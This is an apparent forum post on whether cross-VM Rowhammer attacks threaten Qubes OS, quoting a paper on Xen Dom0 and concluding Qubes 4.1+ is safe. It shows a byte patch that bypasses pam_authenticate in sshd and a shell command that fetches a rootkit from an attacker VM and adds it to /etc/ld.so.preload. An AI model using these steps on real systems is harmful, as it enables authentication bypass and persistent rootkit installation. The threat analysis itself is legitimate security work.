6.3 Cross-VM Row Hammer Exploitation
[..]
6.3.2 Integrity Attacks
[..]
Particularly, the victim was the management domain in Xen, the Dom0.
[..]
Once the signature was found, the adversary immediately replaced a five-byte
instruction “0xe8 0x1b 0x74 0xfd 0xff” (binary code for “callq pam_authenticate”)
with another five-byte instruction “0xb8 0x00 0x00 0x00 0x00” (binary code for
“mov $0 %eax”). Note here even though the memory page is read-only in the
victimVM, Dom0, the adversary may have arbitrary read/write access to it without
any restriction.
[..]
In the paper the attacker writes to an opensshd
process to bypass pam_authenticate()
.
[..]
The modified code assigned %eax value 0 directly, without calling pam_authenticate(),
so the authentication will be bypassed.
[..]
In Qubes a different process would have to be used, i.e. crond
or meminfo-writer
. Writing five bytes would not suffice, one needs about 160 bytes or so for
/usr/bin/sh -c "qvm-run --pass-io pwnedVM 'cat /home/user/.badly_hidden_rootkit' > /tmp/librootkit.so && echo /tmp/librootkit.so >> /etc/ld.so.preload"
and another 30 bytes or so to run the execve(char *filename, char **argv, char **envp)
syscall.
You can call that privilege escalation if you like, I’d like to call it game over.
7 Discussion on Existing Countermeasures
Row hammer resistance with hardware-assisted virtualization.
[..]
One way to prevent physical address disclosure to guest VMs is to adopt
hardware-assisted virtualization, such as Intel’s VT-x [31] and AMD’s AMD-V [2].
[..]
Good to know. So we could answer the question if RowHammer poses a threat to QubesOS with:
To our best knowledge it does not if you use Qubes 4.1+ with HVMs and PVHs only.
edit: no sudo
needed as crond
and meminfo-writer
already run as root.